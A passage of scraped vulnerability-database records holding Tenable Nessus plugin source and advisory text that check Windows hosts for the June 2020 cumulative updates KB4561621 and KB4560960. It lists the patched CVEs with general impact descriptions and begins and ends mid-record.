value:\"http://www.nessus.org/u?89a45c0c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4561621.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1299\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1317\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4561621'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17134',\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4561621])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T14:06:53", "description": "The remote Windows host is missing security update 4560960. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the way that the wlansvc.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1273, CVE-2020-1274, CVE-2020-1275, CVE-2020-1276, CVE-2020-1307, CVE-2020-1316)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-1348)\n\n - A vulnerability exists in the way the Windows Diagnostics & feedback settings app handles objects in memory. An attacker who successfully exploited this vulnerability could cause additional diagnostic data from the affected device to be sent to Microsoft.\n (CVE-2020-1296)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1287)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the way Windows Error Reporting (WER) handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1261, CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) IIS module improperly handles uploaded content. An attacker who successfully exploited this vulnerability could upload restricted file types to an IIS-hosted folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting manager improperly handles a process crash. An attacker who successfully exploited this vulnerability could delete a targeted file leading to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1291)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1238, CVE-2020-1239)\n\n - An information disclosure vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1206)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector or the Visual Studio Standard Collector fail to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when Windows Mobile Device Management (MDM) Diagnostics improperly handles junctions. An attacker who successfully exploited this vulnerability could bypass access restrictions to delete files. (CVE-2020-1204)\n\n - An elevation of privilege vulnerability exists in the way the Windows Now Playing Session Manager handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-1201)\n\n - A denial of service vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited the vulnerability could cause a target system to stop responding. (CVE-2020-1283)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the way that the Connected Devices Platform Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when Windows Kernel fails to properly sanitize certain parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges. An attacker with unprivileged access to a vulnerable system could exploit this vulnerability. The security update addresses the vulnerability by ensuring the Diagnostics Hub Standard Collector Service properly handles file operations. (CVE-2020-1257, CVE-2020-1278, CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Bluetooth Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1280)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1248)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could read memory that was freed and might run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1315)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when a Windows service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1268)\n\n - An elevation of privilege vulnerability exists when the Windows Update Orchestrator Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Update Orchestrator Service handles file operations. (CVE-2020-1313)\n\n - A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability exists in Windows Security Health Service when handling certain objects in memory. (CVE-2020-1162, CVE-2020-1324)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1213, CVE-2020-1214, CVE-2020-1215, CVE-2020-1216, CVE-2020-1230, CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way that Microsoft browsers access objects in memory. The vulnerability could corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows Registry improperly handles filesystem operations. An attacker who successfully exploited the vulnerability could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235, CVE-2020-1265, CVE-2020-1282, CVE-2020-1304, CVE-2020-1306, CVE-2020-1334)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows State Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when Windows Host Guardian Service improperly handles hashes recorded and logged. An attacker who successfully exploited the vulnerability could tamper with the log file. In an attack scenario, an attacker can change existing event log types to a type the parsers do not interpret allowing an attacker to append their own hash without triggering an alert. The update addresses the vulnerability by correcting how Windows Host Guardian Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network List Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1209)\n\n - A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. (CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-1277, CVE-2020-1302, CVE-2020-1312)\n\n - An information disclosure vulnerability exists in the way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this vulnerability could determine the origin of all webpages in the affected browser. (CVE-2020-1242)\n\n - An elevation of privilege vulnerability exists when an OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when Group Policy improperly checks access. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when Windows Lockscreen fails to properly load spotlight images from a secure location. An attacker who successfully exploited the vulnerability could execute commands with elevated permissions. An authenticated attacker could modify a registry value to exploit this vulnerability. The security update addresses the vulnerability by ensuring that the spotlight images are always loaded from a secure location. (CVE-2020-1279)\n\n - An elevation of privilege vulnerability exists in OpenSSH for Windows when it does not properly restrict access to configuration settings. An attacker who successfully exploited this vulnerability could replace the shell with a malicious binary. (CVE-2020-1292)\n\n - An elevation of privilege vulnerability exists in the way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when Windows Modules Installer Service improperly handles class object members. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. The update addresses the vulnerability by correcting how Windows handles calls to preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when Component Object Model (COM) client uses special case IIDs. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251, CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1258)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles objects in memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge (Chromium-based) in IE Mode improperly handles specific redirects. An attacker who successfully exploits the IE Mode vulnerability could trick a user into believing that the user was on a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the Windows Shell does not properly validate file paths. An attacker who successfully exploited this vulnerability could run arbitrary code in the context of the current user. If the current user is logged on as an administrator, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with elevated privileges. Users whose accounts are configured to have fewer privileges on the system could be less impacted than users who operate with administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in Windows Text Service Framework (TSF) when the TSF server fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this vulnerability could run arbitrary code in a privileged process. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1314)\n\n - A denial of service vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could cause a system to stop responding. (CVE-2020-1244)\n\n - An elevation of privilege vulnerability exists when the Windows Spatial Data Service improperly handles objects in memory. An attacker could exploit the vulnerability to overwrite or modify a protected file leading to a privilege escalation. (CVE-2020-1441)", "cvss3": {}, "published": "2020-06-09T00:00:00", "type": "nessus", "title": "KB4560960: Windows 10 Version 1903 and Windows 10 Version 1909 June 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0915", "CVE-2020-0916", "CVE-2020-0986", "CVE-2020-1073", "CVE-2020-1160", "CVE-2020-1162", "CVE-2020-1194", "CVE-2020-1196", "CVE-2020-1197", "CVE-2020-1201", "CVE-2020-1202", "CVE-2020-1203", "CVE-2020-1204", "CVE-2020-1206", "CVE-2020-1207", "CVE-2020-1208", "CVE-2020-1209", "CVE-2020-1211", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1214", "CVE-2020-1215", "CVE-2020-1216", "CVE-2020-1217", "CVE-2020-1219", "CVE-2020-1220", "CVE-2020-1222", "CVE-2020-1230", "CVE-2020-1231", "CVE-2020-1232", "CVE-2020-1233", "CVE-2020-1234", "CVE-2020-1235", "CVE-2020-1236", "CVE-2020-1237", "CVE-2020-1238", "CVE-2020-1239", "CVE-2020-1241", "CVE-2020-1242", "CVE-2020-1244", "CVE-2020-1246", "CVE-2020-1247", "CVE-2020-1248", "CVE-2020-1251", "CVE-2020-1253", "CVE-2020-1254", "CVE-2020-1255", "CVE-2020-1257", "CVE-2020-1258", "CVE-2020-1259", "CVE-2020-1260", "CVE-2020-1261", "CVE-2020-1262", "CVE-2020-1263", "CVE-2020-1264", "CVE-2020-1265", "CVE-2020-1266", "CVE-2020-1268", "CVE-2020-1269", "CVE-2020-1270", "CVE-2020-1271", "CVE-2020-1272", "CVE-2020-1273", "CVE-2020-1274", "CVE-2020-1275", "CVE-2020-1276", "CVE-2020-1277", "CVE-2020-1278", "CVE-2020-1279", "CVE-2020-1280", "CVE-2020-1281", "CVE-2020-1282", "CVE-2020-1283", "CVE-2020-1286", "CVE-2020-1287", "CVE-2020-1290", "CVE-2020-1291", "CVE-2020-1292", "CVE-2020-1293", "CVE-2020-1296", "CVE-2020-1299", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1302", "CVE-2020-1304", "CVE-2020-1305", "CVE-2020-1306", "CVE-2020-1307", "CVE-2020-1309", "CVE-2020-1310", "CVE-2020-1311", "CVE-2020-1312", "CVE-2020-1313", "CVE-2020-1314", "CVE-2020-1315", "CVE-2020-1316", "CVE-2020-1317", "CVE-2020-1324", "CVE-2020-1334", "CVE-2020-1348", "CVE-2020-1441"], "modified": "2023-03-06T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4560960.NASL", "href": "https://www.tenable.com/plugins/nessus/137254", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137254);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/03/06\");\n\n script_cve_id(\n \"CVE-2020-0915\",\n \"CVE-2020-0916\",\n \"CVE-2020-0986\",\n \"CVE-2020-1073\",\n \"CVE-2020-1160\",\n \"CVE-2020-1162\",\n \"CVE-2020-1194\",\n \"CVE-2020-1196\",\n \"CVE-2020-1197\",\n \"CVE-2020-1201\",\n \"CVE-2020-1202\",\n \"CVE-2020-1203\",\n \"CVE-2020-1204\",\n \"CVE-2020-1206\",\n \"CVE-2020-1207\",\n \"CVE-2020-1208\",\n \"CVE-2020-1209\",\n \"CVE-2020-1211\",\n \"CVE-2020-1212\",\n \"CVE-2020-1213\",\n \"CVE-2020-1214\",\n \"CVE-2020-1215\",\n \"CVE-2020-1216\",\n \"CVE-2020-1217\",\n \"CVE-2020-1219\",\n \"CVE-2020-1220\",\n \"CVE-2020-1222\",\n \"CVE-2020-1230\",\n \"CVE-2020-1231\",\n \"CVE-2020-1232\",\n \"CVE-2020-1233\",\n \"CVE-2020-1234\",\n \"CVE-2020-1235\",\n \"CVE-2020-1236\",\n \"CVE-2020-1237\",\n \"CVE-2020-1238\",\n \"CVE-2020-1239\",\n \"CVE-2020-1241\",\n \"CVE-2020-1242\",\n \"CVE-2020-1244\",\n \"CVE-2020-1246\",\n \"CVE-2020-1247\",\n \"CVE-2020-1248\",\n \"CVE-2020-1251\",\n \"CVE-2020-1253\",\n \"CVE-2020-1254\",\n \"CVE-2020-1255\",\n \"CVE-2020-1257\",\n \"CVE-2020-1258\",\n \"CVE-2020-1259\",\n \"CVE-2020-1260\",\n \"CVE-2020-1261\",\n \"CVE-2020-1262\",\n \"CVE-2020-1263\",\n \"CVE-2020-1264\",\n \"CVE-2020-1265\",\n \"CVE-2020-1266\",\n \"CVE-2020-1268\",\n \"CVE-2020-1269\",\n \"CVE-2020-1270\",\n \"CVE-2020-1271\",\n \"CVE-2020-1272\",\n \"CVE-2020-1273\",\n \"CVE-2020-1274\",\n \"CVE-2020-1275\",\n \"CVE-2020-1276\",\n \"CVE-2020-1277\",\n \"CVE-2020-1278\",\n \"CVE-2020-1279\",\n \"CVE-2020-1280\",\n \"CVE-2020-1281\",\n \"CVE-2020-1282\",\n \"CVE-2020-1283\",\n \"CVE-2020-1286\",\n \"CVE-2020-1287\",\n \"CVE-2020-1290\",\n \"CVE-2020-1291\",\n \"CVE-2020-1292\",\n \"CVE-2020-1293\",\n \"CVE-2020-1296\",\n \"CVE-2020-1299\",\n \"CVE-2020-1300\",\n \"CVE-2020-1301\",\n \"CVE-2020-1302\",\n \"CVE-2020-1304\",\n \"CVE-2020-1305\",\n \"CVE-2020-1306\",\n \"CVE-2020-1307\",\n \"CVE-2020-1309\",\n \"CVE-2020-1310\",\n \"CVE-2020-1311\",\n \"CVE-2020-1312\",\n \"CVE-2020-1313\",\n \"CVE-2020-1314\",\n \"CVE-2020-1315\",\n \"CVE-2020-1316\",\n \"CVE-2020-1317\",\n \"CVE-2020-1324\",\n \"CVE-2020-1334\",\n \"CVE-2020-1348\",\n \"CVE-2020-1441\"\n );\n script_xref(name:\"MSKB\", value:\"4560960\");\n script_xref(name:\"MSFT\", value:\"MS20-4560960\");\n script_xref(name:\"IAVA\", value:\"2020-A-0247-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0256-S\");\n script_xref(name:\"IAVA\", value:\"2020-A-0300-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0051\");\n\n script_name(english:\"KB4560960: Windows 10 Version 1903 and Windows 10 Version 1909 June 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4560960. It is, \ntherefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the wlansvc.dll handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262,\n CVE-2020-1264, CVE-2020-1266, CVE-2020-1269,\n CVE-2020-1273, CVE-2020-1274, CVE-2020-1275,\n CVE-2020-1276, CVE-2020-1307, CVE-2020-1316)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-1348)\n\n - A vulnerability exists in the way the Windows\n Diagnostics & feedback settings app handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could cause additional diagnostic data\n from the affected device to be sent to Microsoft.\n (CVE-2020-1296)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows WalletService handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1287)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1261,\n CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n IIS module improperly handles uploaded content. An\n attacker who successfully exploited this vulnerability\n could upload restricted file types to an IIS-hosted\n folder. (CVE-2020-1255)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1291)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-1238,\n CVE-2020-1239)\n\n - An information disclosure vulnerability exists in the\n way that the Microsoft Server Message Block 3.1.1\n (SMBv3) protocol handles certain requests. An attacker\n who successfully exploited the vulnerability could\n obtain information to further compromise the users\n system. (CVE-2020-1206)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector fail to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when\n Windows Mobile Device Management (MDM) Diagnostics\n improperly handles junctions. An attacker who\n successfully exploited this vulnerability could bypass\n access restrictions to delete files. (CVE-2020-1204)\n\n - An elevation of privilege vulnerability exists in the\n way the Windows Now Playing Session Manager handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1201)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2020-1283)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the\n way that the Connected Devices Platform Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when\n Windows Kernel fails to properly sanitize certain\n parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-1257, CVE-2020-1278,\n CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Bluetooth Service handles objects\n in memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-1280)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1248)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when the Windows Installer fails to\n properly sanitize input leading to an insecure library\n loading behavior. A locally authenticated attacker could\n run arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, 